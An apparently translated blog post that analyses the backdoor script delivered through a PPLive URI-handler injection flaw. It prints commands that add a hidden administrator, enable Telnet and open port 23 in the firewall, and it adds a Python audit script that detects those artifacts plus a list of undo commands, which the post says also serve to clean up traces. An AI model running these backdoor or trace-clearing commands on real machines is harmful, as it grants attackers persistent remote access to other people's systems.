While looking at the PPLive <= 1.9.21 uri handlers "/LoadModule" remote argument injection vulnerability today, I learned yet another command: netsh firewall add portopening ...
I had long wondered how BC and eMule manage to open their listening ports in the Windows Firewall; today I finally got to see it. The remote DLL injected through the PPLive 1.9.21 vulnerability is nothing more than a simple script, which tidied up looks like this:
1 cmd /c net user abc abc123456 /add
2 cmd /c net localgroup Administrators abc /add
3 cmd /c sc config TlntSvr start= auto
4 cmd /c net start TlntSvr
5 cmd /c netsh firewall add portopening tcp 23 sh
6 cmd /c echo REGEDIT4 > sh.reg
7 cmd /c echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >> sh.reg
8 cmd /c echo "forceguest"=dword:00000000 >> sh.reg
9 cmd /c regedit /S sh.reg
10 cmd /c del sh.reg
The first two lines add an administrator named abc (password abc123456) to the system.
Lines 3-4 turn on the Telnet service and set it to start automatically.
Line 5 is the key point: it lets the listener on TCP port 23 (Telnet) through the firewall, so the firewall is no longer in the way. The trailing sh is just the display name of the new rule, the one you will see in netsh firewall show portopening. (netsh firewall is the Windows XP SP2 / Server 2003 firewall context; Vista and later use netsh advfirewall firewall instead.)
Lines 6-10 write out a .reg file that turns off Simple File Sharing (ForceGuest), which probably makes no difference either way here.
After that, telnet 127.0.0.1 and log in as abc / abc123456 and you are in, and the firewall never prompts.
(Audience: all that fuss and you only open Telnet? Stone him! ... If it were a server you would really be better off opening 3389.)
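As an added example that is not part of the original post, here is a small Python audit script that parses the output of netsh firewall show portopening, net localgroup Administrators and sc qc TlntSvr and flags exactly the artifacts the script above leaves behind: a non-baseline firewall opening (TCP 23 named "sh"), an unexpected member of Administrators, and Telnet no longer disabled. The three sample outputs are constructed by hand and modelled on the Windows XP text format; column layout and wording differ between Windows versions and locales, so the regexes, the baseline sets and the constants are assumptions to adjust for the host being checked.

```python
import re

# Constructed sample output, modelled on what Windows XP SP2's
# "netsh firewall show portopening" prints (assumption: layout varies by version/locale).
NETSH_PORTOPENING = """\
Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service
23     TCP       Enable   sh
"""

# Constructed sample output, modelled on "net localgroup Administrators".
NET_LOCALGROUP_ADMINS = """\
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
abc
The command completed successfully.
"""

# Constructed sample output, modelled on "sc qc TlntSvr" after "sc config TlntSvr start= auto".
SC_QC_TLNTSVR = """\
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: TlntSvr
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\WINDOWS\\system32\\tlntsvr.exe
        DISPLAY_NAME       : Telnet
        SERVICE_START_NAME : LocalSystem
"""

# Assumed baseline for a stock XP box: the four file-and-print openings and the built-in admin.
BASELINE_PORTS = {(139, "TCP"), (445, "TCP"), (137, "UDP"), (138, "UDP")}
BASELINE_ADMINS = {"Administrator"}
REMOTE_SHELL_PORTS = {23: "Telnet", 3389: "RDP"}

PORT_RE = re.compile(r"^\s*(\d+)\s+(TCP|UDP)\s+(Enable|Disable)\s+(.*?)\s*$")


def parse_portopenings(text):
    """Return (port, protocol, mode, name) tuples from netsh portopening output."""
    rows = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            rows.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return rows


def parse_localgroup_members(text):
    """Return the member names listed below the dashed separator of net localgroup output."""
    members, in_members = [], False
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("-----"):
            in_members = True
            continue
        if in_members:
            if not s or s.startswith("The command completed"):
                break
            members.append(s)
    return members


def parse_start_type(text):
    """Return the symbolic START_TYPE (e.g. AUTO_START, DISABLED) from sc qc output, or None."""
    m = re.search(r"START_TYPE\s*:\s*\d+\s+(\w+)", text)
    return m.group(1) if m else None


def audit(netsh_out, localgroup_out, sc_out):
    """Collect human-readable findings for the three persistence artifacts."""
    findings = []
    for port, proto, mode, name in parse_portopenings(netsh_out):
        if mode == "Enable" and (port, proto) not in BASELINE_PORTS:
            label = REMOTE_SHELL_PORTS.get(port, "non-baseline")
            findings.append(f"firewall: {proto}/{port} ({label}) opened as '{name}'")
    for member in parse_localgroup_members(localgroup_out):
        if member not in BASELINE_ADMINS:
            findings.append(f"admins: unexpected member '{member}'")
    start = parse_start_type(sc_out)
    if start and start != "DISABLED":
        findings.append(f"service: TlntSvr start type is {start}")
    return findings


if __name__ == "__main__":
    for finding in audit(NETSH_PORTOPENING, NET_LOCALGROUP_ADMINS, SC_QC_TLNTSVR):
        print(finding)
```

On a real host, replace the three constants with captured output, e.g. subprocess.run(["netsh", "firewall", "show", "portopening"], capture_output=True, text=True).stdout, and extend the baseline sets with whatever openings and administrators are legitimately present.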
The script to put things back, which of course can also be used to clean up traces:
cmd /c net user abc /delete
cmd /c net stop TlntSvr
cmd /c sc config TlntSvr start= disabled
cmd /c sc config TlntSvr displayname= "Telnet" start= disabled
cmd /c netsh firewall delete portopening tcp 23